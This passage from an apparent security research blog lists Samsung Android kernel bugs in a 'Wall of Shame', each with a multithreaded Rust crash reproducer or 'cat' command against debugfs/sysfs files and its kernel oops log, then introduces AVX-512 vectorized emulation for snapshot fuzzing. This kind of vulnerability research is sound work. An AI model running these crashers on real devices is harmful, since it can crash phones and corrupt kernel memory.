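            unsafe {
                libc::ioctl(fd.as_raw_fd(), request as _, 0usize);
            }
        }
    }
}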

In the future maybe I’ll exploit one of these bugs in another blog, or root cause them in source.

Wall of Shame

Try it out on your own test phones (not on your actual phone, that’d probably be a bad idea). Let me know if you have any silly bugs found by this to add to the wall of shame.

G900F (Exynos Galaxy S5) [G900FXXU1CRH1] (August 1, 2017)

PoC

use std::fs::File;
use std::io::Read;

fn thrasher() {
    // Buffer to read into
    let mut buf = [0x41u8; 8192];

    // Path of the file to hammer (`fn` is a keyword, so use `path`)
    let path = "/sys/kernel/debug/smp2p_test/ut_remote_gpio_inout";

    loop {
        if let Ok(mut fd) = File::open(path) {
            let _ = fd.read(&mut buf);
        }
    }
}

fn main() {
    // Make fuzzing threads
    let mut threads = Vec::new();
    for _ in 0..4 {
        threads.push(std::thread::spawn(move || thrasher()));
    }

    // Wait for all threads to exit
    for thr in threads {
        let _ = thr.join();
    }
}

J200H (Galaxy J2) [J200HXXU0AQK2] (August 1, 2017)

not root caused, just run the fuzzer

[c0] Unable to handle kernel paging request at virtual address 62655726
[c0] pgd = c0004000
[c0] [62: ee456000
[c0] PC is at devres_for_each_res+0x68/0xdc
[c0] LR is at 0x62655722
[c0] pc : [<c0302848>]    lr : [<62655722>]    psr: 000d0093
sp : ee457d20  ip : 00000000  fp : ee457d54
[c0] r10: ed859210  r9 : c0c833e4  r8 : ed859338
[c0] r7 : ee456000
[c0] PC is at devres_for_each_res+0x68/0xdc
[c0] LR is at 0x62655722
[c0] pc : [<c0302848>]    lr : [<62655722>]    psr: 000d0093
[c0] [<c0302848>] (devres_for_each_res+0x68/0xdc) from [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118)
[c0] [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118) from [<c0306050>] (dpm_for_each_dev+0x4c/0x6c)
[c0] [<c0306050>] (dpm_for_each_dev+0x4c/0x6c) from [<c030d824>] (fw_pm_notify+0xe4/0x100)
[c0] [<c030d0013 00000000 ffffffff ffffffff
[c0] [<c0302848>] (devres_for_each_res+0x68/0xdc) from [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118)
[c0] [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118) from [<c0306050>] (dpm_for_each_dev+0x4c/0x6c)
[c0] [<c0306050>] (dpm_for_each_dev+0x4c/0x6c) from [<c030d824>] (fw_pm_notify+0xe4/0x100)
[c0] [<c030d[<c0063824>] (pm_notifier_call_chain+0x28/0x3c)
[c0] [<c0063824>] (pm_notifier_call_chain+0x28/0x3c) from [<c00644a0>] (pm_suspend+0x154/0x238)
[c0] [<c00644a0>] (pm_suspend+0x154/0x238) from [<c00657bc>] (suspend+0x78/0x1b8)
[c0] [<c00657bc>] (suspend+0x78/0x1b8) from [<c003d6bc>] (process_one_work+0x160/0x4b8)
[c0] [<c003d6bc>] [<c0063824>] (pm_notifier_call_chain+0x28/0x3c)
[c0] [<c0063824>] (pm_notifier_call_chain+0x28/0x3c) from [<c00644a0>] (pm_suspend+0x154/0x238)
[c0] [<c00644a0>] (pm_suspend+0x154/0x238) from [<c00657bc>] (suspend+0x78/0x1b8)
[c0] [<c00657bc>] (suspend+0x78/0x1b8) from [<c003d6bc>] (process_one_work+0x160/0x4b8)

J500H (Galaxy J5) [J500HXXU2BQI1] (August 1, 2017)

cat /sys/kernel/debug/usb_serial0/readstatus

or

cat /sys/kernel/debug/usb_serial1/readstatus

or

cat /sys/kernel/debug/usb_serial2/readstatus

or

cat /sys/kernel/debug/usb_serial3/readstatus

J500H (Galaxy J5) [J500HXXU2BQI1] (August 1, 2017)

cat /sys/kernel/debug/mdp/xlog/dump

J500H (Galaxy J5) [J500HXXU2BQI1] (August 1, 2017)

cat /sys/kernel/debug/rpm_master_stats

J700H (Galaxy J7) [J700HXXU3BRC2] (August 1, 2017)

not root caused, just run the fuzzer

Unable to handle kernel paging request at virtual address ff00000107
pgd = ffffffc03409d000
[ff00000107] *pgd=0000000000000000
mms_ts 9-0048: mms_sys_fw_update [START]
mms_ts 9-0048: mms_fw_update_from_storage [START]
mms_ts 9-0048: mms_fw_update_from_storage [ERROR] file_open - path[/sdcard/melfas.mfsb]
mms_ts 9-0048: mms_fw_update_from_storage [ERROR] -3
mms_ts 9-0048: mms_sys_fw_update [DONE]
muic-universal:muic_show_uart_sel AP
usb: enable_show dev->enabled=1
sm5703-fuelga0000000000000000
Kernel BUG at ffffffc00034e124 [verbose debug info unavailable]
Internal error: Oops - BUG: 96000004 [#1] PREEMPT SMP
exynos-snapshot: item - log_kevents is disabled
CPU: 4 PID: 9022 Comm: lulandroid Tainted: G        W    3.10.61-8299335 #1
task: ffffffc01049cc00 ti: ffffffc002824000 task.ti: ffffffc002824000
PC is at sysfs_open_file+0x4c/0x208
LR is at sysfs_open_file+0x40/0x208
pc : [<ffffffc00034e124>] lr : [<ffffffc00034e118>] pstate: 60000045
sp : ffffffc002827b70

G920F (Exynos Galaxy S6) [G920FXXU5DQBC] (February 1, 2017) Now gated by selinux :(

sec_debug_store_fault_addr 0xffffff80000fe008
Unhandled fault: synchronous external abort (0x96000010) at 0xffffff80000fe008
------------[ cut here ]------------
Kernel BUG at ffffffc0003b6558 [verbose debug info unavailable]
Internal error: Oops - BUG: 96000010 [#1] PREEMPT SMP
exynos-snapshot: core register saved(CPU:0)
CPUMERRSR: 0000000012100088, L2MERRSR: 00000000111f41b8
exynos-snapshot: context saved(CPU:0)
exynos-snapshot: item - log_kevents is disabled
CPU: 0 PID: 5241 Comm: hookah Tainted: G        W      3.18.14-9519568 #1
Hardware name: Samsung UNIVERSAL8890 board based on EXYNOS8890 (DT)
task: ffffffc830513000 ti: ffffffc822378000 task.ti: ffffffc822378000
PC is at samsung_pin_dbg_show_by_type.isra.8+0x28/0x68
LR is at samsung_pinconf_dbg_show+0x88/0xb0
Call trace:
[<ffffffc0003b6558>] samsung_pin_dbg_show_by_type.isra.8+0x28/0x68
[<ffffffc0003b661c>] samsung_pinconf_dbg_show+0x84/0xb0
[<ffffffc0003b66d8>] samsung_pinconf_group_dbg_show+0x90/0xb0
[<ffffffc0003b4c84>] pinconf_groups_show+0xb8/0xec
[<ffffffc0002118e8>] seq_read+0x180/0x3ac
[<ffffffc0001f29b8>] vfs_read+0x90/0x148
[<ffffffc0001f2e7c>] SyS_read+0x44/0x84

G950F (Exynos Galaxy S8) [G950FXXU4CRI5] (September 1, 2018)

Can crash by getting PC in the kernel. Probably a race condition heap corruption. Needs a groom.

(This PC crash is old, since it’s corruption this is some old repro from an unknown version, probably April 2018 or so)

task: ffffffc85f672880 ti: ffffffc8521e4000 task.ti: ffffffc8521e4000
PC is at jopp_springboard_blr_x2+0x14/0x20
LR is at seq_read+0x15c/0x3b0
pc : [<ffffffc000c202b0>] lr : [<ffffffc00024a074>] pstate: a0000145
sp : ffffffc8521e7d20
x29: ffffffc8521e7d30 x28: ffffffc8521e7d90
x27: ffffffc029a9e640 x26: ffffffc84f10a000
x25: ffffffc8521e7ec8 x24: 00000072755fa348
x23: 0000000080000000 x22: 0000007282b8c3bc
x21: 0000000000000e71 x20: 0000000000000000
x19: ffffffc029a9e600 x18: 00000000000000a0
x17: 0000007282b8c3b4 x16: 00000000ff419000
x15: 000000727dc01b50 x14: 0000000000000000
x13: 000000000000001f x12: 00000072755fa1a8
x11: 00000072755fa1fc x10: 0000000000000001
x9 : ffffffc858cc5364 x8 : 0000000000000000
x7 : 0000000000000001 x6 : 0000000000000001
x5 : ffffffc000249f18 x4 : ffffffc000fcace8
x3 : 0000000000000000 x2 : ffffffc84f10a000
x1 : ffffffc8521e7d90 x0 : ffffffc029a9e600

PC: 0xffffffc000c20230:
0230  128001a1 17fec15d 128001a0 d2800015 17fec46e 128001b4 17fec62b 00000000
0250  01bc8a68 ffffffc0 d503201f a9bf4bf0 b85fc010 716f9e10 712eb61f 54000040
0270  deadc0de a8c14bf0 d61f0000 a9bf4bf0 b85fc030 716f9e10 712eb61f 54000040
0290  deadc0de a8c14bf0 d61f0020 a9bf4bf0 b85fc050 716f9e10 712eb61f 54000040
02b0  deadc0de a8c14bf0 d61f0040 a9bf4bf0 b85fc070 716f9e10 712eb61f 54000040
02d0  deadc0de a8c14bf0 d61f0060 a9bf4bf0 b85fc090 716f9e10 712eb61f 54000040
02f0  deadc0de a8c14bf0 d61f0080 a9bf4bf0 b85fc0b0 716f9e10 712eb61f 54000040
0310  deadc0de a8c14bf0 d61f00a0 a9bf4bf0 b85fc0d0 716f9e10 712eb61f 54000040

PoC

extern crate rand;

use std::fs::File;
use std::io::Read;

fn thrasher() {
    // These are the 2 files we want to fuzz
    let random_paths = [
        "/sys/devices/platform/battery/power_supply/battery/mst_switch_test",
        "/sys/devices/platform/battery/power_supply/battery/batt_wireless_firmware_update"
    ];

    // Buffer to read into
    let mut buf = [0x41u8; 8192];

    loop {
        // Pick a random file
        let file = &random_paths[rand::random::<usize>() % random_paths.len()];

        // Read a random number of bytes from the file
        if let Ok(mut fd) = File::open(file) {
            let rsz = rand::random::<usize>() % (buf.len() + 1);
            let _ = fd.read(&mut buf[..rsz]);
        }
    }
}

fn main() {
    // Make fuzzing threads
    let mut threads = Vec::new();
    for _ in 0..4 {
        threads.push(std::thread::spawn(move || thrasher()));
    }

    // Wait for all threads to exit
    for thr in threads {
        let _ = thr.join();
    }
}

Vectorized Emulation: Hardware accelerated taint tracking at 2 trillion instructions per second

14 October 2018 at 21:37

This is the introduction of a multipart series. It is to give a high level overview without really deeply diving into any individual component.

Read the next post in the series: MMU Design

Vectorized emulation, why do I do this to myself?

Why

Changelog

Date Info
2018-10-14 Initial

Tweeter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up, or I think you can use RSS or something if you’re still one of those people.

Performance disclaimer

All benchmarks done here are on a single Xeon Phi 7210 with 96 GiB of RAM. This comes out to about $4k USD, but if you cheap out on RAM and buy used Phis you could probably get the same setup for $1k USD.

This machine has 64 cores and 256 hardware threads. Using AVX-512 I run 4096 32-bit VMs at a time ((512 / 32) * 256).

All performance numbers in this article refer to the machine running at 100% on all cores.

Terminology

Term Inology
Lane A single component in a larger vector (often 32-bit throughout this document)
VM A single VM, in terms of vectorized emulation it refers to a single lane of a vector

Intro

In this blog I’m going to introduce you to a concept I’ve been working on for almost 2 years now. Vectorized emulation. The goal is to take standard applications and JIT them to their AVX-512 equivalent such that we can fuzz 16 VMs at a time per thread. The net result of this work allows for high performance fuzzing (approx 40 billion to 120 billion instructions per second [the 2 trillion clickbait number is theoretical maximum]) depending on the target, while gathering differential coverage on code, register, and memory state.

By gathering more than just code coverage we are able to track state of code deeper than just code coverage itself, allowing us to fuzz through things like memcmp() without any hooks or static analysis of the target at all.

Further since we’re running emulated code we are able to run a soft MMU implementation which has byte-level permissions. This gives us stronger-than-ASAN memory protections, making bugs fail faster and cleaner.

How it came to be an idea

My history with fuzzing tools starts off effectively with my hypervisor for fuzzing, falkervisor. falkervisor served me well for quite a long time, but my work rotated more towards non-x86 targets, which it did not support. With a demand for emulation I made modifications to QEMU for high-performance fuzzing, and ultimately swapped out their MMU implementation for my own which has byte-level permissions. This new byte-level permission model allowed me to catch even the smallest memory corruptions, leading to finding pretty fun bugs!

More and more after working with QEMU I got annoyed. It’s designed for whole systems yet I was using it for fuzzing targets that were running with unknown hardware and running from dynamically dumped memory snapshots. Due to the level of abstraction in QEMU I started to get concerned with the potential unknowns that would affect the instrumentation and fuzzing of targets.

I developed my first MIPS emulator. It was not designed for performance, but rather purely for simple usage and perfect single stepping. You step an instruction, registers and memory get updated. No JIT, no intermediate registers, no flushing or weird block level translation changes. I eventually made a JIT for this that maintained the flush-state-every-instruction model and successfully used it against multiple targets. I also developed an ARM emulator somewhere in this timeframe.

When early 2017 rolls around I’m bored and want to buy a Xeon Phi. Who doesn’t want a 64-core 256-thread single processor? I really had no need for the machine so I just made up some excuse in my head that the high bandwidth memory on die would make reverting snapshots faster. Yeah… like that really matters? Oh well, I bought it.

While the machine was on the way I had this idea… when fuzzing from a snapshot all VMs initially start off fuzzing with the exact same state, except for maybe an input buffer and length being changed. Thus they do identical operations until user-controlled data is processed. I’ve done some fun vectorization work before, but what got me thinking is why not just emit vpaddd instead of add when JITting, and now I can run 16 VMs at a time!

Alas… the idea was born

A primer on snapshot fuzzing

Snapshot fuzzing is fundamental to this work and almost all fuzzing work I have done from 2014 and beyond. It warrants its own blog entirely.

Snapshot fuzzing is a method of fuzzing where you start from a partially-executed system state. For example I can run an application under GDB, like a parser, put a breakpoint after the file/network data has been read, and then dump memory and register state to a core dump using gcore. At this point I have full memory and register state for the application. I can then load up this core dump into any emulator, set up memory contents and permissions, set up register state, and continue execution. While this is an example with core dumps on Linux, this methodology works the same whether the snapshot is a core dump from GDB, a minidump on Windows, or even an exotic memory dump taken from an exploit on a locked-down device like a phone.

All that matters is that I have memory state and register state. From this point I can inject/modify the file contents in memory and continue execution with a new input!

It can get a lot more complex when dealing with kernel state, like file handles, network packets buffered in the kernel, and really anything that lives behind syscalls. However in most targets you can make some custom rigging using strace to know which FDs line up, where they are currently seeked, etc. Further a full system snapshot can be used instead of a single application and then this kernel state is no longer a concern.

The benefits of snapshot fuzzing are performance (linear scaling), high levels of introspection (even without source or symbols), and most importantly… determinism. Unless the emulator has bugs snapshot fuzzing is typically deterministic (sometimes relaxed for performance). Find some super exotic race condition while snapshot fuzzing? Well, you can single step through with the same input and now you can look at the trace as a human, even if it’s a 1 in a billion chance of hitting.

A primer on vectorized instruction sets

Since the 90s many computer architectures have some form of SIMD (vectorized) instruction set. SIMD stands for single instruction multiple data. This means that a single instruction performs an operation (typically the same) on multiple different pieces of data. SIMD instruction sets fall under names like MMX, SSE, AVX, AVX512 for x86, NEON for ARM, and AltiVec for PPC. You’ve probably seen these instructions if you’ve ever looked at a memcpy() implementation on any 64-bit x86 system. They’re the ones with the gross 15 character mnemonics and registers you didn’t even know existed.

For a simple case lets talk about standard SSE on x86. Since x86_64 started with the Pentium 4 and the Pentium 4 had up to SSE3 implementations, almost any x86_64 compiler will generate SSE instructions as they’re always valid on 64-bit systems.

SSE provides 128-bit SIMD operations to x86. SSE introduced 16 128-bit registers named xmm0 through xmm15 (only 8 xmm registers on 32-bit x86). These 128-bit registers can be treated as groups of different sized smaller pieces of data which sum up to 128 bits.

  • 4 single precision floats
  • 2 double precision floats
  • 2 64-bit integers
  • 4 32-bit integers
  • 8 16-bit integers
  • 16 8-bit integers

Now with a single instruction it is possible to perform the same operation on multiple floats or integers. For example there is an instruction paddd, which stands for packed add dwords. This means that the 128-bit registers provided are treated as 4 32-bit integers, and an add operation is performed.

Here’s a real example, adding xmm0 and xmm1 together treating them as 4 individual 32-bit integer lanes and storing them back into xmm0

paddd xmm0, xmm1

Register Dword 1 Dword 2 Dword 3 Dword 4
xmm0 5 6 7 8
xmm1 10 20 30 40
xmm0 (result) 15 26 37 48
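
If it helps to see those semantics in code, here is the same operation modeled in plain Rust, with arrays standing in for the 4 dword lanes (no actual SIMD, purely illustrative):

// Model of `paddd xmm0, xmm1`: 4 independent 32-bit lanes, added lanewise
fn paddd(xmm0: [u32; 4], xmm1: [u32; 4]) -> [u32; 4] {
    let mut result = [0u32; 4];
    for lane in 0..4 {
        // Packed adds wrap per lane, there is no carry between lanes
        result[lane] = xmm0[lane].wrapping_add(xmm1[lane]);
    }
    result
}

fn main() {
    // Matches the table above
    assert_eq!(paddd([5, 6, 7, 8], [10, 20, 30, 40]), [15, 26, 37, 48]);
}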

Cool. Starting with AVX these registers were expanded to 256-bits thus allowing twice the throughput per instruction. These registers are named ymm0 through ymm15. Further AVX introduced three operand form instructions which allow storing a result to a different register than the ones being used in the operation. For example you can do vpaddd ymm0, ymm1, ymm2 which will add the 8 individual 32-bit integers in ymm1 and ymm2 and store the result into ymm0. This helps a lot with register scheduling and prevents many unnecessary movs just to save off registers before they are clobbered.

AVX-512

AVX-512 is a continuation of x86’s SIMD model by expanding from 16 256-bit registers to 32 512-bit registers. These registers are named zmm0 through zmm31. Further AVX-512 introduces 8 new kmask registers named k0 through k7 where k0 has a special meaning.

The kmask registers are used to perform masking on instructions, either by merging or zeroing. This makes it possible to loop through data and process it while having conditional masking to disable operations on a given lane of the vector.

The syntax for the common instructions using kmasks are the following:

vpaddd zmm0 {k1}, zmm1, zmm2

chart simplified to show 4 lanes instead of 16

Register Dword 1 Dword 2 Dword 3 Dword 4
zmm0 9 9 9 9
zmm1 1 2 3 4
zmm2 10 20 30 40
k1 1 0 1 1
zmm0 (result) 11 9 33 44

or

vpaddd zmm0 {k1}{z}, zmm1, zmm2

chart simplified to show 4 lanes instead of 16

Register Dword 1 Dword 2 Dword 3 Dword 4
zmm0 9 9 9 9
zmm1 1 2 3 4
zmm2 10 20 30 40
k1 1 0 1 1
zmm0 (result) 11 0 33 44

The first example uses k1 as the kmask for the add operation. In this case the k1 register is treated as a 16-bit number, where each bit corresponds to each of the 16 32-bit lanes in the 512-bit register. If the corresponding bit in k1 is zero, then the add operation is not performed and that lane is left unchanged in the resultant register.

In the second example there is a {z} suffix on the kmask register selection, this means that the operation is performed with zeroing rather than merging. If the corresponding bit in k1 is zero then the resultant lane is zeroed out rather than left unchanged. This gets rid of a dependency on the previous register state of the result and thus is faster, however it might not be suitable for all applications.

The k0 mask is implicit and does not need to be specified. The k0 register is hardwired to having all bits set, thus the operation is performed on all lanes unconditionally.

Prior to AVX-512 compare instructions in SIMD typically yielded all ones in a given lane if the comparision was true, or all zeroes if it was false. In AVX-512 comparison instructions are done using kmasks.

vpcmpgtd k2 {k1}, zmm10, zmm11

You may have seen this instruction in the picture at the start of the blog. What this instruction does is compare the 16 dwords in zmm10 with the 16 dwords in zmm11, and only performs the compare on lanes enabled by k1, and stores the result of the compare into k2. If the lane was disabled due to k1 then the corresponding bit in the k2 result will be zero. Meaning the only set bits in k2 will be from enabled lanes which were greater in zmm10 than in zmm11. Phew.
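
To tie the masking rules together, here is a plain-Rust model of merge masking and a kmask-producing compare. Arrays stand in for 16-lane ZMM registers and a u16 stands in for a kmask; this is illustrative only, not real intrinsics:

// Model of `vpaddd dst {k}, a, b` with merge masking
fn vpaddd_merge(dst: [u32; 16], a: [u32; 16], b: [u32; 16], k: u16) -> [u32; 16] {
    let mut out = dst;
    for lane in 0..16 {
        if (k >> lane) & 1 == 1 {
            // Enabled lane: perform the add
            out[lane] = a[lane].wrapping_add(b[lane]);
        }
        // Disabled lane: merge masking leaves dst unchanged
        // (zero masking `{z}` would instead force out[lane] = 0)
    }
    out
}

// Model of `vpcmpgtd kout {k}, a, b`: signed greater-than, result is a kmask
fn vpcmpgtd(a: [u32; 16], b: [u32; 16], k: u16) -> u16 {
    let mut out = 0u16;
    for lane in 0..16 {
        // Lanes disabled by `k` always produce a 0 bit in the result
        if (k >> lane) & 1 == 1 && (a[lane] as i32) > (b[lane] as i32) {
            out |= 1 << lane;
        }
    }
    out
}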

Vectorized emulation

Now that you’ve made it this far you might already have some gears turning in your head telling you where this might be going next.

Since with snapshot fuzzing we start executing the same code, we are doing the same operations. This means we can convert the x86 instructions to their vectorized counterparts and run 16 VMs at a time rather than just one.

Let’s make up a fake program:

mov eax, 5
mov ebx, 10
add eax, ebx
sub eax, 20

How can we vectorize this code?

; Register allocation:
; eax = zmm0
; ebx = zmm1

vpbroadcastd zmm0, dword ptr [memory containing constant 5]
vpbroadcastd zmm1, dword ptr [memory containing constant 10]
vpaddd       zmm0, zmm0, zmm1
vpsubd       zmm0, zmm0, dword ptr [memory containing constant 20] {1to16}

Well that was kind of easy. We’ve got a few new AVX concepts here. We’re using the vpbroadcastd instruction to broadcast a dword value to all lanes of a given ZMM register. Since the Xeon Phi is bottlenecked on the instruction decoder it’s actually faster to load from memory than it is to load an immediate into a GPR, move this into a XMM register, and then broadcast it out.

Further we introduce the {1to16} broadcasting that AVX-512 offers. This allows us to use a single dword constant value with in our example vpsubd. This broadcasts the memory pointed to to all 16 lanes and then performs the operation. This saves one instruction as we don’t need an explicit vpbroadcastd.

In this case if we executed this code with any VM state we will have no divergence (no VMs do anything different), thus this example is very easy. It’s pretty much a 1-to-1 translation of the non-vectorized x86 to vectorized x86.

Alright, let’s try one a bit more complex, this time let’s work with VMs in different states:

add eax, 10

becomes

; Register allocation:
; eax = zmm0

vpaddd zmm0, zmm0, dword ptr [memory containing constant 10] {1to16}

Let’s imagine that the value in eax prior to execution is different, let’s say it’s [1, 2, 3, 4] for 4 different VMs (simplified, in reality there are 16).

Register Dword 1 Dword 2 Dword 3 Dword 4
zmm0 1 2 3 4
const 10 10 10 10
zmm0 (result) 11 12 13 14

Oh? This is exactly what AVX is supposed to do… so it’s easy?

Okay it’s not that easy

So you might have noticed we’ve dodged a few things here that are hard. First we’ve ignored memory operations, and second we’ve ignored branches.

Lets talk a bit about AVX memory

With AVX-512 we can load and store directly from/to memory, and ideally this memory is aligned as 512-bit registers are whole 64-byte cache lines. In AVX-512 we use the vmovdqa32 instruction. This will load an entire aligned 64-byte piece of memory into a ZMM register ala vmovdqa32 zmm0, [memory], and we can store with vmovdqa32 [memory], zmm0. Further when using kmasks with vmovdqa32 for loads the corresponding lane is left unmodified (merge masking) or zeroed (zero masking). For stores the value is simply not written if the corresponding mask bit is zero.

That’s pretty easy. But this doesn’t really work well when we have 16 unique VMs we’re running with unique address spaces.

… or does it?

VM memory interleaving

Since most VM memory operations are not affected by user input, and thus are the same in all VMs, we need a way to organize the 16 VMs memory such that we can access them all quickly. To do this we actually interleave all 16 VMs at the dword level (32-bit). This means we can perform a single vmovdqa32 to load or store to memory for all 16 VMs as long as they’re accessing the same address.

This is pretty simple, just interleave at the dword level:

chart simplified to show 4 lanes instead of 16

Guest Address Host Address Dword 1 Dword 2 Dword 3 Dword 16
0x0000 0x0000 1 2 3 33
0x0004 0x0040 32 74 55 45
0x0008 0x0080 24 24 24 24

All we need to do is take the guest address, multiply it by 16, and then vmovdqa32 from/to that address. It once again does not matter what the contents of the memory are for each VM and they can differ. The vmovdqa32 does not care about the memory contents.

In reality the host address is not just the guest address multiplied by 16 as we need some translation layer. But that will get its own entire blog. For now let's just assume a flat, infinite memory model where we can just multiply by 16.
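
Under that simplifying assumption, the translation for a single lane is nothing more than this (a sketch only; the real MMU replaces the multiply with a proper translation layer):

/// Number of 32-bit VMs interleaved per dword of guest memory
const LANES: usize = 16;

/// Host byte offset of the start of the 16-lane group for a dword-aligned
/// guest address (what the single vmovdqa32 would load or store)
fn host_group_offset(guest_addr: usize) -> usize {
    assert!(guest_addr % 4 == 0, "Only dword-aligned accesses in this sketch");
    guest_addr * LANES
}

/// Host byte offset of one specific VM's copy of that dword
fn host_lane_offset(guest_addr: usize, lane: usize) -> usize {
    host_group_offset(guest_addr) + lane * 4
}

fn main() {
    // Matches the interleaving table above
    assert_eq!(host_group_offset(0x0000), 0x0000);
    assert_eq!(host_group_offset(0x0004), 0x0040);
    assert_eq!(host_group_offset(0x0008), 0x0080);
    assert_eq!(host_lane_offset(0x0004, 1), 0x0044);
}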

So what are the limitations of this model?

Well when reading bytes we must read the whole dword value and then shift and mask to extract the specific byte. When writing a byte we need to read the memory first, shift, mask, and or in the new byte, and write it out. And when doing non-aligned operations we need to perform multiple memory operations and combine the values via shifting and masking. Luckily compilers (and programmers) typically avoid these unaligned operations and they’re rare enough to not matter much.

Divergence

So far everything we have talked about does not care about the values it is operating on at all, thus everything has been easy so far. But in reality values do matter. There are 3 places where divergence matters in this entire system:

  • Loads/stores with different addresses
  • Branches
  • Exceptions/faults

Loads/stores with different addresses

Let’s knock out the first one real quick, loads and stores with different addresses. For all memory accesses we do a very quick horizontal comparison of all the lanes first. If they have the same address then we take a fast path and issue a single vmovdqa32. If their addresses differ than we simply perform 16 individual memory operations and emulate the behavior we desire. It technically can get a bit better as AVX-512 has scatter/gather instructions which allow the CPU to do this load/storing to different addresses for us. This is done with a base and an offset, with 32-bits it’s not possible to address the whole address space we need. However with 64-bit vectorization (8 64-bit VMs) we can leverage scatter/gather instructions to their fullest and all loads and stores just become a fast path with one vmovdqa32, or a slow (but fast) path where we use a single scatter/gather instruction.

Branches

We’ve avoided this until now for a reason. It’s the single hardest thing in vectorized emulation. How can we possibly run 16 VMs at a time if one branches to another location. Now we cannot run a AVX-512 instruction as it would be invalid for the VMs which have gone down a different path.

Well it turns out this isn’t a terribly hard problem on AVX-512. And when I say AVX-512 I mean specifically AVX-512. Feel free to ponder why this might be based on what you’ve learned is unique to AVX-512.

Okay it’s kmasks. Did you get it right? Well kmasks save our lives. Remember the merging kmasks we talked about which would disable updates to a given lane of a vector and ignore writes to a given lane if it is not enabled in the kmask?

Well by using a kmask register on all JITted AVX-512 instructions we can simply change the kmask to disable updates on a given VM.

What this allows us to do is start execution at the same location on all 16 VMs as they start with the same EIP. On all branches we will horizontally compare the branch targets and compute a new kmask value to use when we continue execution on the new branch.

AVX-512 doesn’t have a great way of extracting or broadcasting arbitrary elements of a vector. However it has a fast way to broadcast the 0th lane in a vector ala vpbroadcastd zmm0, xmm0. This takes the first lane from xmm0 and broadcasts it to all 16 lanes in zmm0. We actually never stop following VM #0. This means VM #0 is always executing, which is important for all of the horizontal compares that we talk about. When I say horizontal compare I mean a broadcast of the VM#0 and compare with all other VMs.

Let’s look in-detail at the entire JIT that I use for conditional indirect branches:

; IL operation is Beqz(val, true_target, false_target)
;
; val          - 16 32-bit values to conditionally branch by
; true_target  - 16 32-bit guest branch target addresses if val == 0
; false_target - 16 32-bit guest branch target addresses if val != 0
;
; IL pseudocode:
;
; if val == 0 {
;    goto true_target;
; } else {
;    goto false_target;
; }
;
; Register usage
; k1    - The execution kmask, this is the kmask used on all JITted instructions
; k2    - Temporary kmask, just used for scratch
; val   - Dynamically allocated zmm register containing val
; ttgt  - Dynamically allocated zmm register containing true_target
; ftgt  - Dynamically allocated zmm register containing false_target
; zmm0  - Scratch register
; zmm31 - Desired branch target for all lanes

; Compute a kmask `k2` which contains `1`s for the corresponding lanes
; for VMs which are enabled by `k1` and also have a non-zero value.
; TL;DR: k2 contains a mask of VMs which will be taking `ftgt`
vptestmd k2 {k1}, val, val

; Store the true branch target unconditionally, while not clobbering
; VMs which have been disabled
vmovdqa32 zmm31 {k1}, ttgt

; Store the false branch target for VMs not taking the branch
; Note the use of k2
vmovdqa32 zmm31 {k2}, ftgt

; At this point `zmm31` contains the targets for all VMs. Including ones
; that previously got disabled.

; Broadcast the target that VM #0 wants to take to all lanes in `zmm0`
vpbroadcastd zmm0, xmm31

; Compute a new kmask of which represents all VMs which are going to
; the same location as VM #0
vpcmpeqd k1, zmm0, zmm31

; ...
; Now just rip out the target for VM #0 and translate the guest address
; into the host JIT address and jump there.
; Or break out and generate the JIT if it hasn't been hit before

The above code is quite fast and isn’t a huge performance issue, especially as we’re running 16 VMs at a time and branches are “rare” with respect to expensive operations like memory loads and stores.

One thing that is important to note is that zmm31 always contains the last desired branch target for a given VM. Even after it has been disabled. This means that it is possible for a VM which has been disabled to come back online if VM #0 ends up going to the same location.

Lets go through a more thorough example:

; Register allocation:
; ebx - Pointer to some user controlled buffer
; ecx - Length of controlled buffer

; Validate buffer size
cmp ecx, 4
jne .end

; Fallthrough
.next:

; Check some magic from the buffer
cmp dword ptr [ebx], 0x13371337
jne .end

; Fallthrough
.next2:

; Conditionally jump to end, for clarity
jmp .end

.end:

And the theoretical vectorized output (not actual JIT output):

; Register allocation:
; zmm10 - ebx
; zmm11 - ecx
; k1    - The execution kmask, this is the kmask used on all JITted instructions
; k2    - Temporary kmask, just used for scratch
; zmm0  - Scratch register
; zmm8  - Scratch register
; zmm31 - Desired branch target for all lanes

; Compute kmask register for VMs which have `ecx` == 4
vpcmpeqd k2 {k1}, zmm11, dword ptr [memory containing 4] {1to16}

; Update zmm31 to reference the respective branch target
vmovdqa32 zmm31 {k1}, address of .end  ; By default we go to end
vmovdqa32 zmm31 {k2}, address of .next ; If `ecx` == 4, go to .next

; Broadcast the target that VM #0 wants to take to all lanes in `zmm0`
vpbroadcastd zmm0, xmm31

; Compute a new kmask of which represents all VMs which are going to
; the same location as VM #0
vpcmpeqd k1, zmm0, zmm31

; Branch to where VM #0 is going (simplified)
jmp where_vm0_wants_to_go

.next:

; Magicially load memory at ebx (zmm10) into zmm8
vmovdqa32 zmm8, complex_mmu_operation_and_stuff

; Compute kmask register for VMs which have packet contents 0x13371337
vpcmpeqd k2 {k1}, zmm8, dword ptr [memory containing 0x13371337] {1to16}

; Go to .next2 if memory is 0x13371337, else go to .end
vmovdqa32 zmm31 {k1}, address of .end   ; By default we go to end
vmovdqa32 zmm31 {k2}, address of .next2 ; If contents == 0x13371337 .next2

; Broadcast the target that VM #0 wants to take to all lanes in `zmm0`
vpbroadcastd zmm0, xmm31

; Compute a new kmask of which represents all VMs which are going to
; the same location as VM #0
vpcmpeqd k1, zmm0, zmm31

; Branch to where VM #0 is going (simplified)
jmp where_vm0_wants_to_go

.next2:

; Everyone still executing is unconditionally going to .end
vmovdqa32 zmm31 {k1}, address of .end

; Broadcast the target that VM #0 wants to take to all lanes in `zmm0`
vpbroadcastd zmm0, xmm31

; Compute a new kmask of which represents all VMs which are going to
; the same location as VM #0
vpcmpeqd k1, zmm0, zmm31

.end:

Okay so what does the VM state look like for a theoretical version (simplified to 4 VMs):

Starting state, all VMs enabled with different memory contents (pointed to by ebx) and different packet lengths:

Register VM 0 VM 1 VM 2 VM 3
ecx 4 3 4 4
memory 0x13371337 0x13371337 3 0x13371337
K1 1 1 1 1

First branch, all VMs with ecx != 4 are disabled and are pending branches to .end, VM #1 falls off

Register VM 0 VM 1 VM 2 VM 3
ecx 4 3 4 4
memory 0x13371337 0x13371337 3 0x13371337
K1 1 0 1 1
Zmm31 .next .end .next .next

